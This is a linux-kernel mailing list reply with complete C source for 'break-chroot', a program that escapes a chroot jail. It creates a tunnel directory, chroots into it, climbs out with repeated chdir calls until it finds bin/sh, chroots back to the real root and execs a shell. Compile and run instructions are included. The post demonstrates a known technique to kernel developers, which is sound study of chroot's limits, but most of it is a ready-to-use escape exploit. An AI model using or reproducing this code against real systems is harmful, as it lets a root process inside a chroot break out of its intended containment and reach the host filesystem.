Al Viro <[EMAIL PROTECTED]> wrote:
> If you are within chroot jail and capable of chroot(), you can chdir to
> its root, then chroot() to subdirectory and you've got cwd outside of
> your new root. After that you can chdir all way out to original
> root.
Here is some code I wrote a while back to demonstrate that escape
method.
/*
* Break a chroot
*
* Compile this with
*
* gcc -static -Wall break-chroot.c -o break-chroot
*
* Get a root shell in the chrooted environment and run
*
* ./break-chroot
*
* Nick Craig-Wood <[EMAIL PROTECTED]>
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <error.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sys/types.h>
#define SHELL "bin/sh" /* no leading / */
int main(void)
{
struct stat buf;
if (chdir("/"))
perror("chdir /"), exit(1);
printf("Making escape tunnel\n");
mkdir("/tmp", 01777);
mkdir("/tmp/escape-tunnel", 0755);
printf("Doing escape chroot leaving cwd behind\n");
if (chroot("/tmp/escape-tunnel"))
perror("chroot /tmp/escape-tunnel"), exit(1);
printf("Exploit cwd being above the root and find a " SHELL " to run\n");
do {
printf("Going up...\n");
if (chdir("../"))
perror("chdir ../"), exit(1);
} while (stat(SHELL, &buf) != 0);
printf("Chrooting back into the root directory\n");
if (chroot("."))
perror("chroot ."), exit(1);
printf("If this doesn't error you are out of chroot!\n");
if (execl(SHELL, SHELL, 0))
perror("exec " SHELL), exit(1);
printf("Something wicked happened!\n");
return 1;
}
--
Nick Craig-Wood <[EMAIL PROTECTED]> -- http://www.craig-wood.com/nick
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to [EMAIL PROTECTED]
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/
